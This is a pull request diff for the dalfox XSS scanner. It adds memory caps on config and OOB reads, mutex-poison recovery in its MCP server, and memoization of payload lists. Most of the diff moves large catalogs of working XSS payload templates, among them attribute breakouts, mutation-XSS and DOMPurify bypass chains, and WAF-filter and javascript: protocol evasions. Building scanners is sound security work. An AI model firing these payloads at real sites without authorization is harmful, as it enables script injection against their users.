### PR TITLE
perf+fix: hot-path allocation cuts and server/MCP/OOB resource hardening

### DIFF
--- a/src/config.rs
+++ b/src/config.rs
@@ -944,6 +944,13 @@ impl Config {
 // - Otherwise, use "$HOME/.config/dalfox"
 // - Within the selected base directory, prefer "config.toml" over "config.json"
 // - If neither file exists, create "config.toml" with a commented template and return it as created
+/// Upper bound on the size of a config file we will read into memory. Config
+/// files are tiny in practice; the cap exists so a config path that resolves to
+/// a huge / unbounded file (e.g. a symlink to `/dev/zero`) fails fast instead of
+/// slurping unboundedly, keeping config loading consistent with every other
+/// input surface. Shared with the `--config` CLI path in `main`.
+pub const MAX_CONFIG_BYTES: u64 = 1 << 20; // 1 MiB
+
 pub fn load_or_init() -> Result<LoadResult, Box<dyn std::error::Error>> {
     let base_dir = resolve_config_dir()?;
     fs::create_dir_all(&base_dir)?;
@@ -952,7 +959,7 @@ pub fn load_or_init() -> Result<LoadResult, Box<dyn std::error::Error>> {
     let json_path = base_dir.join("config.json");
 
     if toml_path.exists() {
-        let s = fs::read_to_string(&toml_path)?;
+        let s = crate::utils::fs::read_bounded(&toml_path, MAX_CONFIG_BYTES, "config file")?;
         let cfg: Config = toml::from_str(&s)?;
         return Ok(LoadResult {
             config: cfg,
@@ -963,7 +970,7 @@ pub fn load_or_init() -> Result<LoadResult, Box<dyn std::error::Error>> {
     }
 
     if json_path.exists() {
-        let s = fs::read_to_string(&json_path)?;
+        let s = crate::utils::fs::read_bounded(&json_path, MAX_CONFIG_BYTES, "config file")?;
         let cfg: Config = serde_json::from_str(&s)?;
         return Ok(LoadResult {
             config: cfg,

--- a/src/main.rs
+++ b/src/main.rs
@@ -203,8 +203,7 @@ async fn main() {
             // indefinitely. Config files are TOML/JSON — 1 MiB is more
             // than two orders of magnitude over what any real
             // operator-curated config will ever be.
-            const MAX_CONFIG_BYTES: u64 = 1 << 20; // 1 MiB
-            match read_bounded(p, MAX_CONFIG_BYTES, "config file") {
+            match read_bounded(p, dalfox::config::MAX_CONFIG_BYTES, "config file") {
                 Ok(content) => {
                     let is_json_ext = p
                         .extension()

--- a/src/mcp/mod.rs
+++ b/src/mcp/mod.rs
@@ -218,6 +218,16 @@ impl DalfoxMcp {
         eprintln!("[{}] [{}] {}", ts, level, msg);
     }
 
+    /// Lock the jobs map, recovering from a poisoned mutex by taking the inner
+    /// guard instead of re-panicking. The map only ever holds plain job records,
+    /// so operating on a possibly-inconsistent snapshot after a panic elsewhere
+    /// is far safer than turning a single poisoned lock into a permanent,
+    /// server-wide outage where every subsequent tool call panics. Matches the
+    /// recovery policy already used in `mark_job_error_sync`.
+    fn lock_jobs(&self) -> std::sync::MutexGuard<'_, HashMap<String, Job>> {
+        self.jobs.lock().unwrap_or_else(|e| e.into_inner())
+    }
+
     /// Run the retention sweep, but at most once per `PURGE_MIN_INTERVAL_MS`.
     /// Retention is measured in hours so coarse-grained sweeping is fine, and
     /// the throttle avoids locking + scanning the whole map on every tool
@@ -236,7 +246,7 @@ impl DalfoxMcp {
         {
             return;
         }
-        let mut jobs = self.jobs.lock().expect("jobs mutex poisoned");
+        let mut jobs = self.lock_jobs();
         purge_jobs_map(&mut jobs, JOB_RETENTION_SECS);
     }
 
@@ -244,7 +254,7 @@ impl DalfoxMcp {
     async fn run_job(&self, scan_id: String, scan_args: Arc<ScanArgs>) {
         // Grab shared progress counters and cancellation flag for this job
         let (progress, cancel_flag) = {
-            let mut jobs = self.jobs.lock().expect("jobs mutex poisoned");
+            let mut jobs = self.lock_jobs();
             if let Some(j) = jobs.get_mut(&scan_id) {
                 if j.status == JobStatus::Cancelled
                     || j.cancelled.load(std::sync::atomic::Ordering::Relaxed)
@@ -298,7 +308,7 @@ impl DalfoxMcp {
             Err(e) => {
                 let msg = format!("parse_target failed: {}", e);
                 Self::log("ERR", &msg);
-                let mut jobs = self.jobs.lock().expect("jobs mutex poisoned");
+                let mut jobs = self.lock_jobs();
                 if let Some(j) = jobs.get_mut(&scan_id) {
                     j.status = JobStatus::Error;
                     j.error_message = Some(msg);
@@ -544,7 +554,7 @@ impl DalfoxMcp {
         // can't mistake a crashed scan for a clean finish. Cancellation wins.
         let panicked = !was_cancelled && scan_report.worker_panics > 0;
         {
-            let mut jobs = self.jobs.lock().expect("jobs mutex poisoned");
+            let mut jobs = self.lock_jobs();
             if let Some(j) = jobs.get_mut(&scan_id) {
                 // Store partial or complete results
                 j.results = Some(Arc::new(sanitized));
@@ -1042,7 +1052,7 @@ Final results (via get_results_dalfox) include finding type \
         // past it are rejected so an agent loop can't grow the job map /
         // blocking pool without bound.
         let scan_id = {
-            let mut jobs = self.jobs.lock().expect("jobs mutex poisoned");
+            let mut jobs = self.lock_jobs();
             let active = jobs.values().filter(|j| !j.is_terminal()).count();
             if active >= MAX_ACTIVE_SCANS_MCP {
                 return Err(ErrorData::invalid_params(
@@ -1279,7 +1289,7 @@ Call this repeatedly until status is 'done', 'error', or 'cancelled'."
         // deep clone of owned strings (`target_url`, `error_message`) that
         // `jobs.get(&pid).cloned()` used to perform on every poll.
         let snapshot = {
-            let jobs = self.jobs.lock().expect("jobs mutex poisoned");
+            let jobs = self.lock_jobs();
             jobs.get(&pid).map(|job| JobSnapshot {
                 status: job.status.clone(),
                 target_url: job.target_url.clone(),
@@ -1428,7 +1438,7 @@ status, and result_count."
         // Build the response under the lock but only on the JSON values we
         // need; serialization itself runs after the lock is released.
         let entries: Vec<serde_json::Value> = {
-            let jobs = self.jobs.lock().expect("jobs mutex poisoned");
+            let jobs = self.lock_jobs();
             jobs.iter()
                 .filter(|(_, job)| filter_status.as_ref().is_none_or(|f| &job.status == f))
                 .map(|(id, job)| {
@@ -1669,7 +1679,7 @@ still be retrieved via get_results_dalfox."
         if pid.is_empty() {
             return Err(ErrorData::invalid_params("scan_id must not be empty", None));
         }
-        let mut jobs = self.jobs.lock().expect("jobs mutex poisoned");
+        let mut jobs = self.lock_jobs();
         match jobs.get_mut(&pid) {
             Some(job) => {
                 let previous_status = job.status.clone();
@@ -1718,7 +1728,7 @@ Terminal scans are also auto-purged after 1 hour."
         if pid.is_empty() {
             return Err(ErrorData::invalid_params("scan_id must not be empty", None));
         }
-        let mut jobs = self.jobs.lock().expect("jobs mutex poisoned");
+        let mut jobs = self.lock_jobs();
         let previous_status = match jobs.get(&pid) {
             Some(job) => {
                 if !job.is_terminal() {

--- a/src/oob/interactsh/mod.rs
+++ b/src/oob/interactsh/mod.rs
@@ -19,6 +19,15 @@ type ClientResult<T> = std::result::Result<T, Box<dyn std::error::Error + Send +
 /// the rest of the 33-char subdomain label.
 const CORRELATION_ID_LEN: usize = 20;
 const NONCE_LEN: usize = 13;
+/// Cap on the OAST poll/register response body we buffer. Legitimate interactsh
+/// poll JSON is tiny; this bounds memory if a hostile/compromised OAST node
+/// streams an oversized body, consistent with the project's capped-body policy
+/// for scanned targets. A truncated body just yields a parse error the poller
+/// already swallows.
+const OOB_MAX_BODY_BYTES: usize = 4 << 20; // 4 MiB
+/// Upper bound on the pre-allocation hint for the decrypted-interaction buffer,
+/// so a large advertised entry count can't drive an oversized reservation.
+const OOB_MAX_ENTRIES_HINT: usize = 4096;
 const ALPHABET: &[u8] = b"abcdefghijklmnopqrstuvwxyz0123456789";
 
 pub struct InteractshClient {
@@ -44,7 +53,14 @@ pub struct InteractshClient {
 /// (the caller turns that into a soft warning). The RSA-2048 keypair is
 /// generated once and reused across attempts rather than per server.
 pub async fn register_first(config: &OobConfig) -> ClientResult<InteractshClient> {
-    let keys = SessionKeys::generate()?;
+    // RSA-2048 keygen is a 50-300ms CPU burst. Run it on the blocking pool so it
+    // does not stall an async runtime worker (and any other tasks scheduled on
+    // it) for the duration.
+    let keys = tokio::task::spawn_blocking(SessionKeys::generate)
+        .await
+        .map_err(|e| -> Box<dyn std::error::Error + Send + Sync> {
+            format!("OOB keygen task panicked: {e}").into()
+        })??;
     let mut last_err: Option<Box<dyn std::error::Error + Send + Sync>> = None;
     for server in &config.servers {
         let client = match InteractshClient::new(server, config, keys.clone()) {
@@ -169,7 +185,10 @@ impl InteractshClient {
         if !resp.status().is_success() {
             return Err(format!("poll returned HTTP {}", resp.status()).into());
         }
-        let parsed: wire::PollResponse = resp.json().await?;
+        // Cap the buffered body instead of `resp.json()` (which reads without
+        // bound) so a hostile OAST node can't drive an OOM through the poller.
+        let body = crate::utils::http::read_body_capped(resp, OOB_MAX_BODY_BYTES).await?;
+        let parsed: wire::PollResponse = serde_json::from_str(&body)?;
 
         let aes_key_b64 = parsed.aes_key.as_deref().filter(|s| !s.is_empty());
         let Some(aes_key_b64) = aes_key_b64 else {
@@ -182,7 +201,7 @@ impl InteractshClient {
         }
         let aes_key = self.keys.decrypt_aes_key(aes_key_b64)?;
 
-        let mut out = Vec::with_capacity(entries.len());
+        let mut out = Vec::with_capacity(entries.len().min(OOB_MAX_ENTRIES_HINT));
         for item in &entries {
             let Ok(plain) = crypto::decrypt_interaction(&aes_key, item) else {
                 continue;

--- a/src/parameter_analysis/mining.rs
+++ b/src/parameter_analysis/mining.rs
@@ -619,18 +619,13 @@ pub async fn probe_dictionary_params(
             }
         }
         for param in param_chunk {
+            // Early collapse stop. (A second identical `collapsed` check used to
+            // follow immediately with no await in between — dead code, since
+            // this `break 'outer` already fires first when collapsed is set.)
             {
                 let st = stats.lock().await;
                 if st.collapsed {
                     break 'outer;
-                }
-            }
-            // original body below
-            // Early collapse stop
-            {
-                let st = stats.lock().await;
-                if st.collapsed {
-                    break;
                 }
             }
             // Skip if already discovered

--- a/src/payload/xss_event.rs
+++ b/src/payload/xss_event.rs
@@ -108,13 +108,21 @@ pub fn common_event_handler_names() -> &'static [&'static str] {
 /// This replaces the previous static XSS_ATTRIBUTE_PAYLOADS constant to ensure
 /// automatic synchronization when JavaScript payload list changes.
 pub fn get_dynamic_xss_attribute_payloads() -> Vec<String> {
-    let mut out = Vec::new();
-    for ev in common_event_handler_names().iter() {
-        for js in crate::payload::XSS_JAVASCRIPT_PAYLOADS_SMALL.iter() {
-            out.push(format!("{}={}", ev, js));
+    // Memoized: combines the static event-handler name list with the stable
+    // XSS_JAVASCRIPT_PAYLOADS_SMALL const, so the catalog is identical per
+    // process. Avoids rebuilding once per reflection parameter.
+    static CACHE: std::sync::LazyLock<Vec<String>> = std::sync::LazyLock::new(|| {
+        let names = common_event_handler_names();
+        let mut out =
+            Vec::with_capacity(names.len() * crate::payload::XSS_JAVASCRIPT_PAYLOADS_SMALL.len());
+        for ev in names.iter() {
+            for js in crate::payload::XSS_JAVASCRIPT_PAYLOADS_SMALL.iter() {
+                out.push(format!("{}={}", ev, js));
+            }
         }
-    }
-    out
+        out
+    });
+    CACHE.clone()
 }
 
 #[cfg(test)]

--- a/src/payload/xss_html.rs
+++ b/src/payload/xss_html.rs
@@ -14,128 +14,148 @@ pub fn useful_html_tag_names() -> &'static [&'static str] {
 }
 
 pub fn get_dynamic_xss_html_payloads() -> Vec<String> {
-    let templates = [
-        // Attribute breakout first — ensures these are tried before standard HTML payloads.
-        // Standard HTML payloads reflect inside quoted attributes as false-positive R,
-        // blocking the breakout payloads that follow (first R per param wins).
-        "'><IMG src=x onerror={JS} ClAss={CLASS}>",
-        "\"><IMG src=x onerror={JS} ClAss={CLASS}>",
-        "'><sVg onload={JS} claSS={CLASS}>",
-        "\"><sVg onload={JS} claSS={CLASS}>",
-        "' onerror={JS} class={CLASS} src=x '",
-        "\" onerror={JS} class={CLASS} src=x \"",
-        "' onmouseover={JS} class={CLASS} '",
-        "\" onmouseover={JS} class={CLASS} \"",
-        "' onfocus={JS} autofocus class={CLASS} '",
-        "\" onfocus={JS} autofocus class={CLASS} \"",
-        "'><IMG src=x onerror={JS} id={ID}>",
-        "\"><IMG src=x onerror={JS} id={ID}>",
-        "'><sVg onload={JS} iD={ID}>",
-        "\"><sVg onload={JS} iD={ID}>",
-        // Standard HTML injection (body / unquoted / direct contexts)
-        "<IMG src=x onerror={JS} ClAss={CLASS}>",
-        "<sVg onload={JS} claSS={CLASS}>",
-        "<sCrIpt/cLaSs={CLASS}>{JS}</scRipT>",
-        "<xmp><p title=\"</xmp><svg/onload={JS} class={CLASS}>",
-        "<details open ontoggle={JS} class={CLASS}>",
-        "<iFrAme/src=JaVAsCrIPt:{JS} ClAss={CLASS}>",
-        "</<a/href='><svg/onload={JS} claSS={CLASS}>'>",
-        // Newline/tab whitespace variants (bypass space-stripping filters)
-        "<IMG\nsrc=x\nonerror={JS}\nClAss={CLASS}>",
-        "<sVg\nonload={JS}\nclaSS={CLASS}>",
-        "<IMG\tsrc=x\tonerror={JS}\tClAss={CLASS}>",
-        // Safe-tag breakout (title, textarea, noscript, style, xmp)
-        "</title><IMG src=x onerror={JS} ClAss={CLASS}>",
-        "</textarea><IMG src=x onerror={JS} ClAss={CLASS}>",
-        "</noscript><IMG src=x onerror={JS} ClAss={CLASS}>",
-        "</style><IMG src=x onerror={JS} ClAss={CLASS}>",
-        "</xmp><IMG src=x onerror={JS} ClAss={CLASS}>",
-        // ID variants
-        "<IMG src=x onerror={JS} id={ID}>",
-        "<sVg onload={JS} iD={ID}>",
-        "<sCrIpt/ID={ID}>{JS}</scRipT>",
-        "<IMG\nsrc=x\nonerror={JS}\nid={ID}>",
-        "</title><IMG src=x onerror={JS} id={ID}>",
-        "</textarea><IMG src=x onerror={JS} id={ID}>",
-        "</noscript><IMG src=x onerror={JS} id={ID}>",
-        // ── CRS bypass: uncommon tags and events ──────────────────────
-        // SVG animate/set elements — may not be in CRS 941110 tag denylist
-        "<svg><animate onbegin={JS} attributeName=x dur=1s class={CLASS}>",
-        "<svg><set onbegin={JS} attributename=x to=1 class={CLASS}>",
-        // Slash-separated attributes — bypasses CRS 941160 regex expecting whitespace
-        "<svg/onload={JS}/class={CLASS}>",
-        "<img/src=x/onerror={JS}/class={CLASS}>",
-        "<details/open/ontoggle={JS}/class={CLASS}>",
-        // Exotic whitespace (form feed) — bypasses CRS 941320 \\s pattern
-        "<img\x0Csrc=x\x0Conerror={JS}\x0Cclass={CLASS}>",
-        "<svg\x0Bonload={JS}\x0Bclass={CLASS}>",
-        // marquee with onstart (older browsers, rare in WAF denylists)
-        "<marquee onstart={JS} class={CLASS}>",
-        // Custom elements with tabindex+autofocus trick
-        "<x-a onfocus={JS} tabindex=0 autofocus class={CLASS}>",
-        // MathML context with onclick
-        "<math><mi onclick={JS} class={CLASS}>x</mi></math>",
-        // Dialog element
-        "<dialog open onclose={JS} class={CLASS}>",
-        // Equals-sign (=) stripping bypass templates (no attributes/equals signs)
-        "<script>{JS}</script>",
-        "\"><script>{JS}</script>",
-        "'><script>{JS}</script>",
-        "</script><script>{JS}</script>",
-        "</title><script>{JS}</script>",
-        "</textarea><script>{JS}</script>",
-        "</noscript><script>{JS}</script>",
-        "</style><script>{JS}</script>",
-        "</xmp><script>{JS}</script>",
-    ];
-    let mut out = Vec::new();
-    for js in crate::payload::XSS_JAVASCRIPT_PAYLOADS_SMALL.iter() {
-        for tmpl in templates.iter() {
-            let with_js = tmpl.replace("{JS}", js);
-            let with_class = with_js.replace("{CLASS}", crate::scanning::markers::class_marker());
-            let with_id = with_class.replace("{ID}", crate::scanning::markers::id_marker());
-            out.push(with_id);
+    // Memoize the built catalog: the templates are compile-time constants and
+    // the only runtime inputs (class/id markers) are process-stable OnceLock
+    // values, so the result is identical on every call. This collapses the
+    // per-reflection-parameter rebuild (generate_param_jobs + the progress
+    // precount) into a single build. Callers still get an owned clone they may
+    // mutate downstream.
+    static CACHE: std::sync::LazyLock<Vec<String>> = std::sync::LazyLock::new(|| {
+        let templates = [
+            // Attribute breakout first — ensures these are tried before standard HTML payloads.
+            // Standard HTML payloads reflect inside quoted attributes as false-positive R,
+            // blocking the breakout payloads that follow (first R per param wins).
+            "'><IMG src=x onerror={JS} ClAss={CLASS}>",
+            "\"><IMG src=x onerror={JS} ClAss={CLASS}>",
+            "'><sVg onload={JS} claSS={CLASS}>",
+            "\"><sVg onload={JS} claSS={CLASS}>",
+            "' onerror={JS} class={CLASS} src=x '",
+            "\" onerror={JS} class={CLASS} src=x \"",
+            "' onmouseover={JS} class={CLASS} '",
+            "\" onmouseover={JS} class={CLASS} \"",
+            "' onfocus={JS} autofocus class={CLASS} '",
+            "\" onfocus={JS} autofocus class={CLASS} \"",
+            "'><IMG src=x onerror={JS} id={ID}>",
+            "\"><IMG src=x onerror={JS} id={ID}>",
+            "'><sVg onload={JS} iD={ID}>",
+            "\"><sVg onload={JS} iD={ID}>",
+            // Standard HTML injection (body / unquoted / direct contexts)
+            "<IMG src=x onerror={JS} ClAss={CLASS}>",
+            "<sVg onload={JS} claSS={CLASS}>",
+            "<sCrIpt/cLaSs={CLASS}>{JS}</scRipT>",
+            "<xmp><p title=\"</xmp><svg/onload={JS} class={CLASS}>",
+            "<details open ontoggle={JS} class={CLASS}>",
+            "<iFrAme/src=JaVAsCrIPt:{JS} ClAss={CLASS}>",
+            "</<a/href='><svg/onload={JS} claSS={CLASS}>'>",
+            // Newline/tab whitespace variants (bypass space-stripping filters)
+            "<IMG\nsrc=x\nonerror={JS}\nClAss={CLASS}>",
+            "<sVg\nonload={JS}\nclaSS={CLASS}>",
+            "<IMG\tsrc=x\tonerror={JS}\tClAss={CLASS}>",
+            // Safe-tag breakout (title, textarea, noscript, style, xmp)
+            "</title><IMG src=x onerror={JS} ClAss={CLASS}>",
+            "</textarea><IMG src=x onerror={JS} ClAss={CLASS}>",
+            "</noscript><IMG src=x onerror={JS} ClAss={CLASS}>",
+            "</style><IMG src=x onerror={JS} ClAss={CLASS}>",
+            "</xmp><IMG src=x onerror={JS} ClAss={CLASS}>",
+            // ID variants
+            "<IMG src=x onerror={JS} id={ID}>",
+            "<sVg onload={JS} iD={ID}>",
+            "<sCrIpt/ID={ID}>{JS}</scRipT>",
+            "<IMG\nsrc=x\nonerror={JS}\nid={ID}>",
+            "</title><IMG src=x onerror={JS} id={ID}>",
+            "</textarea><IMG src=x onerror={JS} id={ID}>",
+            "</noscript><IMG src=x onerror={JS} id={ID}>",
+            // ── CRS bypass: uncommon tags and events ──────────────────────
+            // SVG animate/set elements — may not be in CRS 941110 tag denylist
+            "<svg><animate onbegin={JS} attributeName=x dur=1s class={CLASS}>",
+            "<svg><set onbegin={JS} attributename=x to=1 class={CLASS}>",
+            // Slash-separated attributes — bypasses CRS 941160 regex expecting whitespace
+            "<svg/onload={JS}/class={CLASS}>",
+            "<img/src=x/onerror={JS}/class={CLASS}>",
+            "<details/open/ontoggle={JS}/class={CLASS}>",
+            // Exotic whitespace (form feed) — bypasses CRS 941320 \\s pattern
+            "<img\x0Csrc=x\x0Conerror={JS}\x0Cclass={CLASS}>",
+            "<svg\x0Bonload={JS}\x0Bclass={CLASS}>",
+            // marquee with onstart (older browsers, rare in WAF denylists)
+            "<marquee onstart={JS} class={CLASS}>",
+            // Custom elements with tabindex+autofocus trick
+            "<x-a onfocus={JS} tabindex=0 autofocus class={CLASS}>",
+            // MathML context with onclick
+            "<math><mi onclick={JS} class={CLASS}>x</mi></math>",
+            // Dialog element
+            "<dialog open onclose={JS} class={CLASS}>",
+            // Equals-sign (=) stripping bypass templates (no attributes/equals signs)
+            "<script>{JS}</script>",
+            "\"><script>{JS}</script>",
+            "'><script>{JS}</script>",
+            "</script><script>{JS}</script>",
+            "</title><script>{JS}</script>",
+            "</textarea><script>{JS}</script>",
+            "</noscript><script>{JS}</script>",
+            "</style><script>{JS}</script>",
+            "</xmp><script>{JS}</script>",
+        ];
+        let mut out = Vec::with_capacity(
+            crate::payload::XSS_JAVASCRIPT_PAYLOADS_SMALL.len() * templates.len(),
+        );
+        for js in crate::payload::XSS_JAVASCRIPT_PAYLOADS_SMALL.iter() {
+            for tmpl in templates.iter() {
+                let with_js = tmpl.replace("{JS}", js);
+                let with_class =
+                    with_js.replace("{CLASS}", crate::scanning::markers::class_marker());
+                let with_id = with_class.replace("{ID}", crate::scanning::markers::id_marker());
+                out.push(with_id);
+            }
         }
-    }
-    out
+        out
+    });
+    CACHE.clone()
 }
 
 /// Generate mXSS (mutation XSS) payloads that exploit browser HTML parser quirks
 /// such as namespace confusion, innerHTML re-parsing, and DOMPurify bypass patterns.
 pub fn get_mxss_payloads() -> Vec<String> {
-    let templates = [
-        // SVG foreignObject namespace confusion
-        "<svg><foreignobject><img src=x onerror={JS} class={CLASS}></foreignobject></svg>",
-        "<svg><foreignObject><body onload={JS} class={CLASS}></foreignObject></svg>",
-        // Math/mtext namespace confusion
-        "<math><mtext><img src=x onerror={JS} class={CLASS}></mtext></math>",
-        "<math><mtext><table><mglyph><style><!--</style><img src=x onerror={JS} class={CLASS}>",
-        // Noscript/textarea/title innerHTML reparse
-        "<noscript><img src=x onerror={JS} class={CLASS}></noscript>",
-        // DOMPurify bypass patterns (form-math-mtext chain)
-        "<form><math><mtext></form><form><mglyph><svg><mtext><style><img src=x onerror={JS} class={CLASS}>",
-        // Template/style-based mutation
-        "<svg></p><style><a id=\"</style><img src=x onerror={JS} class={CLASS}>\">",
-        // annotation-xml encoding reparse
-        "<math><annotation-xml encoding=\"text/html\"><img src=x onerror={JS} class={CLASS}></annotation-xml></math>",
-        // SVG desc/title namespace confusion
-        "<svg><desc><img src=x onerror={JS} class={CLASS}></desc></svg>",
-        // ID variants
-        "<svg><foreignobject><img src=x onerror={JS} id={ID}></foreignobject></svg>",
-        "<math><mtext><img src=x onerror={JS} id={ID}></mtext></math>",
-        "<math><annotation-xml encoding=\"text/html\"><img src=x onerror={JS} id={ID}></annotation-xml></math>",
-    ];
+    // Memoized for the same reason as get_dynamic_xss_html_payloads (stable
+    // templates + process-stable markers).
+    static CACHE: std::sync::LazyLock<Vec<String>> = std::sync::LazyLock::new(|| {
+        let templates = [
+            // SVG foreignObject namespace confusion
+            "<svg><foreignobject><img src=x onerror={JS} class={CLASS}></foreignobject></svg>",
+            "<svg><foreignObject><body onload={JS} class={CLASS}></foreignObject></svg>",
+            // Math/mtext namespace confusion
+            "<math><mtext><img src=x onerror={JS} class={CLASS}></mtext></math>",
+            "<math><mtext><table><mglyph><style><!--</style><img src=x onerror={JS} class={CLASS}>",
+            // Noscript/textarea/title innerHTML reparse
+            "<noscript><img src=x onerror={JS} class={CLASS}></noscript>",
+            // DOMPurify bypass patterns (form-math-mtext chain)
+            "<form><math><mtext></form><form><mglyph><svg><mtext><style><img src=x onerror={JS} class={CLASS}>",
+            // Template/style-based mutation
+            "<svg></p><style><a id=\"</style><img src=x onerror={JS} class={CLASS}>\">",
+            // annotation-xml encoding reparse
+            "<math><annotation-xml encoding=\"text/html\"><img src=x onerror={JS} class={CLASS}></annotation-xml></math>",
+            // SVG desc/title namespace confusion
+            "<svg><desc><img src=x onerror={JS} class={CLASS}></desc></svg>",
+            // ID variants
+            "<svg><foreignobject><img src=x onerror={JS} id={ID}></foreignobject></svg>",
+            "<math><mtext><img src=x onerror={JS} id={ID}></mtext></math>",
+            "<math><annotation-xml encoding=\"text/html\"><img src=x onerror={JS} id={ID}></annotation-xml></math>",
+        ];
 
-    let mut out = Vec::new();
-    for js in crate::payload::XSS_JAVASCRIPT_PAYLOADS_SMALL.iter() {
-        for tmpl in templates.iter() {
-            let with_js = tmpl.replace("{JS}", js);
-            let with_class = with_js.replace("{CLASS}", crate::scanning::markers::class_marker());
-            let with_id = with_class.replace("{ID}", crate::scanning::markers::id_marker());
-            out.push(with_id);
+        let mut out = Vec::with_capacity(
+            crate::payload::XSS_JAVASCRIPT_PAYLOADS_SMALL.len() * templates.len(),
+        );
+        for js in crate::payload::XSS_JAVASCRIPT_PAYLOADS_SMALL.iter() {
+            for tmpl in templates.iter() {
+                let with_js = tmpl.replace("{JS}", js);
+                let with_class =
+                    with_js.replace("{CLASS}", crate::scanning::markers::class_marker());
+                let with_id = with_class.replace("{ID}", crate::scanning::markers::id_marker());
+                out.push(with_id);
+            }
         }
-    }
-    out
+        out
+    });
+    CACHE.clone()
 }
 
 /// Generate protocol-based injection payloads for src/href attributes
@@ -143,32 +163,38 @@ pub fn get_mxss_payloads() -> Vec<String> {
 /// These target contexts where a parameter value is placed directly into a `src` or `href`
 /// attribute, allowing `javascript:` or `data:` URI execution.
 pub fn get_protocol_injection_payloads() -> Vec<String> {
-    let mut out = Vec::new();
-    let js_payloads = crate::payload::XSS_JAVASCRIPT_PAYLOADS_SMALL;
+    // Memoized: depends only on the stable XSS_JAVASCRIPT_PAYLOADS_SMALL const
+    // and pure formatting/base64, so the catalog is identical per process.
+    static CACHE: std::sync::LazyLock<Vec<String>> = std::sync::LazyLock::new(|| {
+        let js_payloads = crate::payload::XSS_JAVASCRIPT_PAYLOADS_SMALL;
+        // 13 variants pushed per JS payload below.
+        let mut out = Vec::with_capacity(js_payloads.len() * 13);
 
-    for js in js_payloads.iter() {
-        // javascript: protocol variants
-        out.push(format!("javascript:{}", js));
-        out.push(format!("Javascript:{}", js)); // capitalized case variation
-        out.push(format!("jAvAsCrIpT:{}", js)); // mixed case
-        out.push(format!("java\tscript:{}", js)); // tab insertion to bypass naive filter
-        out.push(format!("java\nscript:{}", js)); // newline insertion
-        out.push(format!("javascript\t:{}", js)); // tab before colon
-        out.push(format!("\tjavascript:{}", js)); // leading tab
-        out.push(format!("\njavascript:{}", js)); // leading newline
-        // Double-nested javascript: to bypass single-pass removal (e.g. "jajavascriptvascript:")
-        out.push(format!("javas\tcript:{}", js));
-        out.push(format!("javasscriptcript:{}", js)); // bypass gsub("javascript","")
-        out.push(format!("javascriptjavascript:{}", js)); // double prefix to survive one-pass strip
+        for js in js_payloads.iter() {
+            // javascript: protocol variants
+            out.push(format!("javascript:{}", js));
+            out.push(format!("Javascript:{}", js)); // capitalized case variation
+            out.push(format!("jAvAsCrIpT:{}", js)); // mixed case
+            out.push(format!("java\tscript:{}", js)); // tab insertion to bypass naive filter
+            out.push(format!("java\nscript:{}", js)); // newline insertion
+            out.push(format!("javascript\t:{}", js)); // tab before colon
+            out.push(format!("\tjavascript:{}", js)); // leading tab
+            out.push(format!("\njavascript:{}", js)); // leading newline
+            // Double-nested javascript: to bypass single-pass removal (e.g. "jajavascriptvascript:")
+            out.push(format!("javas\tcript:{}", js));
+            out.push(format!("javasscriptcript:{}", js)); // bypass gsub("javascript","")
+            out.push(format!("javascriptjavascript:{}", js)); // double prefix to survive one-pass strip
 
-        // data: protocol variants
-        out.push(format!("data:text/html,<script>{}</script>", js));
-        out.push(format!(
-            "data:text/html;base64,{}",
-            crate::encoding::base64_encode(&format!("<script>{}</script>", js))
-        ));
-    }
-    out
+            // data: protocol variants
+            out.push(format!("data:text/html,<script>{}</script>", js));
+            out.push(format!(
+                "data:text/html;base64,{}",
+                crate::encoding::base64_encode(&format!("<script>{}</script>", js))
+            ));
+        }
+        out
+    });
+    CACHE.clone()
 }
 
 #[cfg(test)]

--- a/src/scanning/check_reflection.rs
+++ b/src/scanning/check_reflection.rs
@@ -599,6 +599,15 @@ pub enum ReflectionKind {
 ///   "&#x3c;script&#x3e;" -> "<script>"
 ///   "&#60;alert(1)&#62;"  -> "<alert(1)>"
 fn decode_html_entities(input: &str) -> String {
+    // Fast path: every HTML entity (numeric `&#…;` and named `&lt;` alike)
+    // begins with '&'. When the input has none, there is nothing to decode, so
+    // skip both regex scans and the second `replace_all().to_string()`
+    // allocation. classify_reflection runs this once per non-reflecting payload
+    // on the whole (up to 16 MiB) response body, so the saved scans/allocations
+    // add up across a scan.
+    if !input.as_bytes().contains(&b'&') {
+        return input.to_string();
+    }
     // Match patterns like &#xHH; or &#xHHHH; or &#DDDD; (hex 'x' is case-insensitive)
     // Upper bound is 8 hex / 8 decimal digits — covers zero-padded WAF-bypass
     // payloads emitted by `html_entity_zero_padded_encode` (`&#x0000003c;`,
@@ -654,6 +663,14 @@ fn decode_html_entities(input: &str) -> String {
 /// Decode form-style URL-encoded text where spaces may be preserved as '+'.
 /// This is intentionally narrow and only used for reflection normalization.
 fn decode_form_urlencoded_like(input: &str) -> Option<String> {
+    // Form decoding can only change the string when it carries a '+' (space
+    // shorthand) or a '%' (percent-escape). Without either, `replace('+',…)`
+    // and `urlencoding::decode` are both no-ops, so skip the two full-body
+    // allocations entirely — this runs per non-reflecting payload on the whole
+    // response body in classify_reflection's slow path.
+    if !input.as_bytes().iter().any(|&b| b == b'+' || b == b'%') {
+        return None;
+    }
     let normalized = input.replace('+', "%20");
     let decoded = urlencoding::decode(&normalized).ok()?.into_owned();
     if decoded == input {
@@ -664,15 +681,17 @@ fn decode_form_urlencoded_like(input: &str) -> Option<String> {
 }
 
 fn payload_variants(payload: &str) -> Vec<String> {
-    let mut variants = Vec::with_capacity(10);
-    let mut seen = std::collections::HashSet::with_capacity(10);
-    let owned_payload = payload.to_string();
-    seen.insert(owned_payload.clone());
-    variants.push(owned_payload);
+    // The variant set is tiny (original + entity-decoded + a short URL-decode
+    // chain capped at MAX_URL_DECODE_ITERATIONS), so a linear membership scan
+    // over the Vec is cheaper than a HashSet — it avoids the per-element hash,
+    // the contains()+insert() double lookup, and the extra String clone the set
+    // required. Order and membership are identical to the old HashSet-guarded
+    // build.
+    let mut variants: Vec<String> = Vec::with_capacity(10);
+    variants.push(payload.to_string());
 
     let html_dec = decode_html_entities(payload);
-    if !seen.contains(&html_dec) {
-        seen.insert(html_dec.clone());
+    if !variants.iter().any(|v| v == &html_dec) {
         variants.push(html_dec);
     }
 
@@ -687,8 +706,7 @@ fn payload_variants(payload: &str) -> Vec<String> {
             if url_dec == current {
                 break;
             }
-            if !seen.contains(&url_dec) {
-                seen.insert(url_dec.clone());
+            if !variants.iter().any(|v| v == &url_dec) {
                 variants.push(url_dec.clone());
             }
             current = url_dec;
